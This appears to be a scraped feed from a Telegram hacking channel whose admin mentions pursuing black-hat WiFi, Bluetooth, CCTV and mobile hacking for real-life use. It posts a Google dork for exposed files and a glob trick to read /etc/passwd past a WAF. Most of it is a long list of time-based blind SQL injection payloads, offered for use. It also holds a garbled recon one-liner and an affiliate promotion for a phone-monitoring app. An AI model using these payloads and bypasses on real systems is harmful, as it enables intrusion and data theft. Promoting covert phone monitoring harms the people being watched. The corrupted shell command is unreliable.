Well, many of you will notice that I have not been posting any videos lately. This is because I have been recharging with black hack hacking for some time now. I am recharging with many things like WiFi hacking 📡as many ways as possible and Bluetooth hacking🚦 and CCTV camera hacking📸 mobile hacking📱 and many more things that I will use in my real life. But if I feel that I need to bring a video or course on this topic, then I will definitely bring it and let you know my opinion.
❤48🖕9👍6❤🔥5
☄️Information Disclosure Dork☄️
site:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)🔥24❤5👎3
A neat trick for bypassing WAF/filters while testing for OS command injection vulnerabilities.
Use shell globbing / wildcard expansion. Here is an example
Before cat runs, the shell expands the glob pattern /e*c/p*s*d to match actual files and directories in the filesystem.
#bugbountytips #hacking
Use shell globbing / wildcard expansion. Here is an example
cat /e*c/p*s*d is equivalent to cat /etc/passwd. But how? Before cat runs, the shell expands the glob pattern /e*c/p*s*d to match actual files and directories in the filesystem.
/e*c: The shell interprets this as "any path starting with /e, followed by zero or more characters (*), ending with c."/p*s*d: This matches a path or file name starting with p, followed by zero or more characters (*), then s, then zero or more characters (*), then d#bugbountytips #hacking
🔥24❤6👍3🤡3❤🔥2
timebased payloads for different dbms:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
👍26❤14🔥10💩5🖕4
☄️IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.
🛍https://github.com/errorfiathck/IDOR-Forge
🛍https://github.com/errorfiathck/IDOR-Forge
❤25👍7💩2🖕2👏1👾1
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
❤33🔥11👍7👎1
I have uploaded my new video, I hope everyone will support me. And share my video.
❤22
The Best Parental Control App for Monitoring Kids' Phones!
https://www.youtube.com/watch?v=3xC-Vxj06Mw&t=1s
https://www.youtube.com/watch?v=3xC-Vxj06Mw&t=1s
YouTube
MoniMaster Review: The Best Parental Control App for Monitoring Kids' Phones!
🔍 MoniMaster Review: The Best Parental Control App for Monitoring Kids' Phones! 🔍
👇 Try MoniMaster Today! 👇
MoniMaster Pro: https://www.monimaster.com/?utm_medium=video-c&utm_source=youtube_haxshadow7&utm_campaign=ZJR
For more phone tips please visit:…
👇 Try MoniMaster Today! 👇
MoniMaster Pro: https://www.monimaster.com/?utm_medium=video-c&utm_source=youtube_haxshadow7&utm_campaign=ZJR
For more phone tips please visit:…
🤔7👍2
📊Vulnerable Bank - An intentionally vulnerable application built for learning secure code reviews and to test api pentesting skills.
GitHub: https://github.com/Commando-X/vuln-bank
GitHub: https://github.com/Commando-X/vuln-bank
👍14❤10
Hello EveryOne Use this Tool
Bounty Prompt: AI-Powered Burp Suite extension
https://bountysecurity.ai/blogs/news/bounty-prompt-ai-powered-burp-suite-extension
Bounty Prompt: AI-Powered Burp Suite extension
https://bountysecurity.ai/blogs/news/bounty-prompt-ai-powered-burp-suite-extension
Bounty Security
Bounty Prompt: AI-Powered Burp Suite extension
Introduction
Bounty Prompt is an open source Burp Suite extension developed by Bounty Security. Leveraging advanced AI technology through Burp AI, this tool enables you to generate intelligent prompts for security testing by analyzing selected HTTP requests…
Bounty Prompt is an open source Burp Suite extension developed by Bounty Security. Leveraging advanced AI technology through Burp AI, this tool enables you to generate intelligent prompts for security testing by analyzing selected HTTP requests…
❤12👍2💩2🔥1
🐧_Bash_Script_Cheatsheet_Automate,_Simplify_and_Command_🎯_.pdf
3.8 MB
🐧 Bash Script Cheatsheet – Automate, Simplify & Command! 🎯💻
🔹 Master Bash Scripting – Automate tasks like a pro! ⚡️
🔹 Learn Commands, Loops, Variables & More – Simplify system management! 🛠
🔹 Essential for Hackers, DevOps & SysAdmins! 🚀
🔹 Master Bash Scripting – Automate tasks like a pro! ⚡️
🔹 Learn Commands, Loops, Variables & More – Simplify system management! 🛠
🔹 Essential for Hackers, DevOps & SysAdmins! 🚀
👍6❤5🔥5👏1